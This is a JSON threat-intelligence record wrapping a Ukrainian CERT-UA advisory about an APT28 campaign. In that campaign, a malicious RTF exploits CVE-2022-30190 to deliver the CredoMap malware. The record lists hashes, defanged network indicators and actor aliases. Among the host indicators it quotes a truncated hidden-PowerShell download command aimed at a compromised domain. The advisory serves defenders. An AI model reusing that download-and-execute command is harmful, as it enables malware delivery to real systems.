{
	"id": "84c13065-64fd-4d0d-8c1c-793d5b19f51d",
	"created_at": "2026-04-06T00:19:31.720552Z",
	"updated_at": "2026-04-10T03:37:00.448636Z",
	"deleted_at": null,
	"sha1_hash": "787a902de6c366aeb8322e3d250fd4ab393120b4",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2339382,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-05 23:45:45 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA виявлено шкідливий\r\nдокумент \"Nuclear Terrorism A Very Real Threat.rtf\" відкриття якого призведе до завантаження HTML-файлу\r\nта виконання JavaScript-коду (CVE-2022-30190), який забезпечить завантаження та запуск шкідливої\r\nпрограми CredoMap.\r\nМета-дані свідчать про модифікацію документу 09.06.2022, а отже його розповсюдження могло бути\r\nздійснене ще 10.06.2022.\r\nЗа сукупністю характерних ознак вважаємо за можливе асоціювати виявлену активність з діяльністю групи\r\nAPT28. \r\nІндикатори компрометації\r\nФайли:\r\neafa11070f213f16efc030f625a423d1  daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01\r\nab6c70af19f7d41a443feb8ccb57d264  14ae02c521b85e60b11393ffc0da5e25946c4775a84995800b73398df4bceffb\r\n56a504a34d2cfbfc7eaa2b68e34af8ad  9309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961\r\nd3bddb5de864afd7e4f5e56027f4e5ea  2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933\r\nМережеві:\r\nhXXp://kitten-268.frge[.]io/article.html\r\nhXXp://kompartpomiar[.]pl/grafika/SQLite.Interop.dll\r\nhXXp://kompartpomiar[.]pl/grafika/docx.exe\r\n162[.]241.216.236\r\nkitten-268.frge[.]io\r\nfrge[.]io (потребує додаткового моніторингу)\r\nkompartpomiar[.]pl (вірогідно, скомпрометований веб-ресурс)\r\nseo@specialityllc[.]com\r\nХостові:\r\n%USERPROFILE%\\docx.exe\r\n%USERPROFILE%\\SQLite.Interop.dll\r\ncmd.exe /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command '\u0026 {iwr http://kompartp\r\nhttps://cert.gov.ua/article/341128\r\nPage 1 of 2\n\nГрафічні зображення\r\nSource: https://cert.gov.ua/article/341128\r\nhttps://cert.gov.ua/article/341128\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/341128"
	],
	"report_names": [
		"341128"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434771,
	"ts_updated_at": 1775792220,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/787a902de6c366aeb8322e3d250fd4ab393120b4.pdf",
		"text": "https://archive.orkl.eu/787a902de6c366aeb8322e3d250fd4ab393120b4.txt",
		"img": "https://archive.orkl.eu/787a902de6c366aeb8322e3d250fd4ab393120b4.jpg"
	}
}